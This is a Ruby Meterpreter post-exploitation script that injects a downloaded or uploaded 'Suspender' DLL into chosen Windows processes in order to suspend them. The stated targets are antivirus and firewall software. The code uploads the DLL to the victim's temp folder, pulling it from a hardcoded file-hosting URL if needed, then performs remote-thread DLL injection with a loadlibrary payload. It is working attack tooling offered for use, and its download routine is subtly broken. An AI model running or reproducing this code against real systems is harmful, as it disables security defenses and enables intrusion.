suspend_resilientprocess.rb

1. #
2. # This Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall
3. # To do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process,
4. # this script generates a payload of type "windows/loadlibrary", after this, will try to allocate a memory space to load the library in the process,
5. # write the allocated memory into the process and finally create a thread to execute the dll.
6. # When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too.
7. # the 'n' seconds corresponds to the value specified in the dll's filename,
8. # for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script
9. #
10. # Version 1.0
11. # written by Adastra.
12. #
13. #Variables del script
14. require 'net/http'
15. require 'uri'
16.  
17. session = client
18. wininfo = client.sys.config.sysinfo
19.  
20.  
21. # Argumentos de la función
22. @@exec_opts = Rex::Parser::Arguments.new(
23.     "-h" => [ false,"Help Menu."],
24.     "-p" => [ true,"List of processes to suspend in the remote machine, each separated by ','." ],
25.     "-s" => [ true,"Number of seconds before suspend the process(es)." ],
26.     "-f" => [ true,"Specify the path of Suspender.dll in the local machine (attacker) to upload in the remote machine." ],
27.     "-d" => [ true,"Download from a website in Internet. If you don't use this option neither '-f' option the default value will used to download the library from internet"]
28. )
29.  
30. processes = []
31. file_suspender_dll = nil
32. url_suspender_dll = 'http://www.fileserve.com/file/kBSgbw4/Suspender.dll'
33. downloadMode = true
34. seconds_to_suspend = nil
35.  
36. def usage
37.     print_line("ScriptThis Script use the Suspender dll's Library to suspend a windows process, ideally a resilient process like an AV or Stateless Firewall. ")
38.     print_line("Para do this, the script uploads the library in the target system and after open the resilient process to suspend, once opened the target process, ")
39.     print_line("this script generates a payload of type 'windows/loadlibrary', after this, will try to allocate a memory space to load the library in the process, ")
40.     print_line("the allocated memory into the process and finally create a thread to execute the dll. ")
41.     print_line("When pass 'n' seconds, the target process will be suspended and his process and threads childs, will be suspended too. ")
42.     print_line("the 'n' seconds corresponds to the value specified in the dll's filename,  ")
43.     print_line("for example: Suspender10.dll will suspend the target process and his childs in 10 seconds. In the Script  ")
44.  
45.     puts @@exec_opts.usage
46.     print_line("Example Usage:")
47.     print_line("run suspendProcess -p process1[,process2,processN] -f PATH_OF_SUSPENDER_DLL")
48.     print_line("run suspendProcess -p process1[,process2,processN] -d URL_OF_SUSPENDER_DLL")
49.     raise Rex::Script::Completed
50. end
51.  
52. def uploadFile(client,file,download,url,seconds)
53.     uploadedFile=''
54.     if download
55.         print_status("Trying to download Suspender from #{url}")
56.        
57.         suspender_dll = Net::HTTP.get URI.parse(url)
58.         file = File.join(Msf::Config.data_directory, "Suspender#{seconds}.dll")
59.         File.open(file, "wb") { |fd| fd.write(file) }
60.         print_status("Suspender10.dll has been downloaded to #{file} (local machine). Please remove manually after use or keep for reuse.")
61.     end
62.    
63.     if not ::File.exists?(file)
64.             raise "File to Upload does not exists!"
65.         else
66.             location = client.fs.file.expand_path("%TEMP%")
67.             fullPath = "#{location}\\Suspender#{seconds}.dll"
68.             begin
69.                 print_status("Uploading #{file}....")
70.                 client.fs.file.upload_file(fullPath, file)
71.                 print_status("successfully uploaded to #{fullPath}!")
72.                 uploadedFile = fullPath
73.                 rescue ::Exception => e
74.                     print_error("Raised a exception uploading the DLL in the remote machine Maybe the library has been uploaded before... #{e}")
75.             end
76.     end
77.     uploadedFile;
78. end
79.  
80. def loadProcceses(session,processes_to_suspend,pathtosuspend)
81.     ret=''
82.    
83.     print_status "Path Library: #{pathtosuspend}"
84.     processes_to_suspend.each do |process|
85.         begin
86.             print_status "Trying to suspend the process with PID: #{process}"
87.             payload = client.framework.payloads.create("windows/loadlibrary")
88.             payload.datastore['DLL'] = pathtosuspend
89.             payload.datastore['EXITFUNC'] = 'thread'
90.             raw_payload = payload.generate
91.             targetprocess = client.sys.process.open(process.to_i, PROCESS_ALL_ACCESS)
92.             memory = targetprocess.memory.allocate(raw_payload.length + (raw_payload.length % 1024))
93.             targetprocess.memory.write(memory, raw_payload)
94.             targetprocess.thread.create(memory, 0)
95.             rescue ::Exception => e
96.                 print_error("Error allocating memory in the target process with PID #{process} the error is: #{e}")
97.                 print_error("following with the next process in the list");
98.                 ret = "#{ret} Error allocating memory in the target process with PID #{process}\n"
99.         end
100.         ret = "#{ret} The signal to suspend the #{process} has been submitted\n"
101.     end
102.     ret;
103. end
104.  
105. #Main Function
106. @@exec_opts.parse(args) {
107. |opt, idx, val|
108.  
109.     case opt
110.     when "-p"
111.         processes.concat(val.split(","))
112.     when "-d"
113.         url_suspender_dll = val
114.         print_status "The Suspender library will be downloaded from Internet, you need internet connection to make this work..."
115.         downloadMode=true;
116.     when "-f"
117.         file_suspender_dll = val
118.         print_status "File to upload: #{file_suspender_dll} "
119.         if not ::File.exists?(file_suspender_dll)
120.             print_error("file not found/accessible!")
121.             usage
122.         end
123.         downloadMode=false;
124.  
125.     when "-s"
126.         seconds_to_suspend = val
127.         if seconds_to_suspend.to_i <= 0
128.             print_error("Number of seconds to suspend the process must be greater than zero!")
129.         end
130.         print_status "Setting the number of seconds to suspend the process at #{seconds_to_suspend}"
131.     when "-h"
132.         usage
133.     else
134.         print_error "Invalid Option: #{opt}"
135.         usage
136.     end
137. }
138.  
139. if seconds_to_suspend == nil
140.     print_status "Setting the number of seconds to default (10 seconds) if you want to change that, you should use the '-s' option"
141.     seconds_to_suspend = "10"
142. end
143. file_suspender_dll = uploadFile(client, file_suspender_dll,downloadMode,url_suspender_dll,seconds_to_suspend) #if file_suspender_dll
144. print_status loadProcceses(session,processes,file_suspender_dll)